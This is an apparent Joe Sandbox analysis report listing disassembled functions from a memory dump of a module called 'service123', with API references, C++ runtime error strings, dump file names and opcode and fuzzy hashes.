Instruction Fuzzy Hash: 06218172E0A3609FC300AF1DD48045EFBE4EB85618F90896EF88897315D331D858CF92

Function 6C2EA9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2EA9FD
wcslen.MSVCRT ref: 6C2EAA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C2EAA20, 6C2EAA70

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 946f35bd863d40e43b5e881e23fb08cef94162b69c53e8466ec553719aa6a87e
Instruction ID: d27b92269fc04c795849fb17a4886fbe0e95a3d64d9d6764493090c84251a6cd
Opcode Fuzzy Hash: 946f35bd863d40e43b5e881e23fb08cef94162b69c53e8466ec553719aa6a87e
Instruction Fuzzy Hash: A01163B19157248FCB01EF2CD18189ABBF4BF46214F42096DE8C99B315D631D955CF92

Function 6C2EA5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2EA60D
wcslen.MSVCRT ref: 6C2EA65D

Strings

basic_string: construction from null is not valid, xrefs: 6C2EA630, 6C2EA680

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 946f35bd863d40e43b5e881e23fb08cef94162b69c53e8466ec553719aa6a87e
Instruction ID: 876ce303d00b4635fbdd9404f3af47999f2164ca7f3a30ab287444470845ee4e
Opcode Fuzzy Hash: 946f35bd863d40e43b5e881e23fb08cef94162b69c53e8466ec553719aa6a87e
Instruction Fuzzy Hash: 981163B19157148FCB01EF2CD08189ABBF4BF46214F43096DE8C49B315D631D959CF92

Function 6C2F98F0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C2FA30E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 6b326b0b2f4b0a46f18da8625dc7844dc1583bb12b3171452d29895df542d88a
Instruction ID: c87d951918673d65350134acb9551cd1c38cfe0973d67c24742ccf64cbf814a3
Opcode Fuzzy Hash: 6b326b0b2f4b0a46f18da8625dc7844dc1583bb12b3171452d29895df542d88a
Instruction Fuzzy Hash: 93A27A30A4425DCFDB10DF69C480B8DFBB2AF46325F288669E865AB692D730DC46CF50

Function 6C2F87C0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C2F91DE

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 5e8c4b9564435795e871ac980f4a6757991e700c884097e53be10afa5c3e011a
Instruction ID: 374181e3d8923fd094b93d74edc78328118d7e7909140b3a0a602415eab86844
Opcode Fuzzy Hash: 5e8c4b9564435795e871ac980f4a6757991e700c884097e53be10afa5c3e011a
Instruction Fuzzy Hash: 20A28B71A4435D8FDB10CF69C480B8DFBB2AF46325F288669E865AB692D730DC46CF50

Function 6C333690 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C333710

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 739011456412092c49f0a310a7cc7545101a0ad2642931d23138fd724627c9ba
Instruction ID: f984689528874d372c333da1f622cf3f6d1a2bc09e25daae3be533c1d6c9e336
Opcode Fuzzy Hash: 739011456412092c49f0a310a7cc7545101a0ad2642931d23138fd724627c9ba
Instruction Fuzzy Hash: 67019EB16093909EC3406F6A80C461BFFE8AF81228F94D96DE4CD47711D33AD4458F62

Function 6C2EA970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2EA98D

Strings

basic_string: construction from null is not valid, xrefs: 6C2EA9B0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: fb12110b32af56df7189c4487caa409a24c5b7d82b59e21dba68ebdb5b63f629
Instruction ID: 627479f2a2d33414cd70a6f54b9272c63f903ece6b09e36dfab3a3bd7a5e78c6
Opcode Fuzzy Hash: fb12110b32af56df7189c4487caa409a24c5b7d82b59e21dba68ebdb5b63f629
Instruction Fuzzy Hash: 8DF054B19157148FCB00EF2CC08185AB7F4BF56214B52046DE8C49B715D631E955CF92

Function 6C2EA580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2EA59D

Strings

basic_string: construction from null is not valid, xrefs: 6C2EA5C0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: fb12110b32af56df7189c4487caa409a24c5b7d82b59e21dba68ebdb5b63f629
Instruction ID: 4e4fee2e29ba8f94d7f7c576d0007014d0f4173f3f9792ff58fd9f5069333ca6
Opcode Fuzzy Hash: fb12110b32af56df7189c4487caa409a24c5b7d82b59e21dba68ebdb5b63f629
Instruction Fuzzy Hash: A3F054B19157148FCB00EF2CC08189AB7F4BF56314B52086DE8C49B715E631E955CF92

Function 6C2EC510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C2EC568
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2EC570

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 01d34b108ed9e8657a1b2d97644fd639d67f2eb658638ebacc5db91a0e5ce3ef
Instruction ID: 6448f1bf35d51474ace5be6bb1ac78ec7d57730673dd0c51f3cf44bcd23fa0dc
Opcode Fuzzy Hash: 01d34b108ed9e8657a1b2d97644fd639d67f2eb658638ebacc5db91a0e5ce3ef
Instruction Fuzzy Hash: 7A017C71A082108BC704DF2DC48055AFBF5EBC9304F5489ADE488EB310D631D855CF87

Function 6C2E0740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C2E0798
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2E07A0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 005243f614f0c9eab2aca3785c5aee84e3cf60a7b34a61122d0c76c8e5a4f528
Instruction ID: 99980d8f4402888f640cfc683b80fc88b44de6894269dcba6c107e1aa1ae4568
Opcode Fuzzy Hash: 005243f614f0c9eab2aca3785c5aee84e3cf60a7b34a61122d0c76c8e5a4f528
Instruction Fuzzy Hash: 4B0146B6A0A3409FC704DF29D881A9AFBE0ABC9310F10992DF488D7714C238D8458F83

Function 6C3046E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afa5e7b1518597376ad396ec1a2ed318d156f9de0c43f9c2c39135722f70327a
Instruction ID: 0ab72853e24649032cc1ca3f4b4b0e46e4e4e4f9f07173226aa8d767d0bd6435
Opcode Fuzzy Hash: afa5e7b1518597376ad396ec1a2ed318d156f9de0c43f9c2c39135722f70327a
Instruction Fuzzy Hash: 4082AD72F042988FDB10CFA8C48078DBBF1AF5A318F198659E865AB796C3319D45CF91

Function 6C302CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb41dbcbb2408abe07089ba13451bc51a2a81bd1d492effca65cd4acbdc9e51e
Instruction ID: 12782eef1cfb0f440e6dc3f05adb87d9055300cba08d5a7986d78ed061358525
Opcode Fuzzy Hash: eb41dbcbb2408abe07089ba13451bc51a2a81bd1d492effca65cd4acbdc9e51e
Instruction Fuzzy Hash: 8C72CF71B09298CFDB51CFA8C484B8DBBF1BF09318F188659D4A5ABB91C3369845CF51

Function 6C30140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2070e24276b326af1519a7bfac25f9038d2c539c460cc9f6d1b9f2d99497164e
Instruction ID: 87e729ddf1fb8d92f255d659b184329d92e9d913f7665c5b151b3fd15c02d1bb
Opcode Fuzzy Hash: 2070e24276b326af1519a7bfac25f9038d2c539c460cc9f6d1b9f2d99497164e
Instruction Fuzzy Hash: DC728C72B08298CFDB11CFA8C48479DBBF1AF0A318F188659E4A5ABB91D335D845CF51

Function 6C302090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f41c6a6015768be079b56c66c9ebe097b6171eb0323ee61779953b6a68445c
Instruction ID: 4b06adc104b57e48fc2bfd03e3e96d25498bc515a7280f481ea07cbffa9ab875
Opcode Fuzzy Hash: c7f41c6a6015768be079b56c66c9ebe097b6171eb0323ee61779953b6a68445c
Instruction Fuzzy Hash: 49729C71A08398CFDB15CFA8C58878DBBF1BF05318F188659D8A5ABB81C336A845CF51

Function 6C3007D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5337a0ec9390921056ee2c0a743dda7338716307b95d7b7e0b90164cba2ce65d
Instruction ID: 4b1782aefc7398dd26a048f8acf2cf1ed51389f661977305ddd6f9f00a644d44
Opcode Fuzzy Hash: 5337a0ec9390921056ee2c0a743dda7338716307b95d7b7e0b90164cba2ce65d
Instruction Fuzzy Hash: C0725872E09698CFDB10CFA8C48478DBBF1BF0A318F188659D4A5ABB91C735A845CF51

Function 6C2EF760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EF8B3

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: e781025af308f79b0d22d2f8501846a20448619b3aaeec4399b71fdd195660b3
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 8F726874A042598FCB04CFA8D080A9EBBF2BF4D315F688659E865BB7A1D731AC41CF51

Function 6C307A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937ed20851b938702345505351dcdb1a6da6ba6cd16ca93d1f059f454ca7a831
Instruction ID: ec8332d68fb6d74182f31ac908d9bbc04e36ff1f96059ada8d8c7dea367c8db5
Opcode Fuzzy Hash: 937ed20851b938702345505351dcdb1a6da6ba6cd16ca93d1f059f454ca7a831
Instruction Fuzzy Hash: EB52B372B052489FDB00CF68C48479DBFF1AF46328F24865AE864AB792D736D845CF91

Function 6C2F2360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 7e3bdbdac830b96487ff85264e0843a884fd0174550729faf966d796c59e6aa1
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 8AE17AB5E4529D8FCB01CFA8C484A8DFBF1AF4A314F184265E865A7791D334AC46CF60

Function 6C31DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: f118b5afc3e0ed798ae3ddafc4b9302f4321ef27bdf37886940bd338270aff33
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 3CD16071A082598FCB05CF68C4C06CDBBF1BF4A328F584265E865ABB91D335D945CFA0

Function 6C319B60 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6C319BF8

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 381a3149377882f0a417996e800849f80ce64ae10124a35ba460cd76e636a75a
Instruction ID: 0fb4ba0f3e20ccd00acaf50a3d6ae6f1f0f23e3e33290dc5c83dfd404a9c8d23
Opcode Fuzzy Hash: 381a3149377882f0a417996e800849f80ce64ae10124a35ba460cd76e636a75a
Instruction Fuzzy Hash: FC212F71A083088FCB58EF75C48499AB7F5AB89348F11992DE8848B706D735D94ECF92

Function 6C2DEB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C2DEB50

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
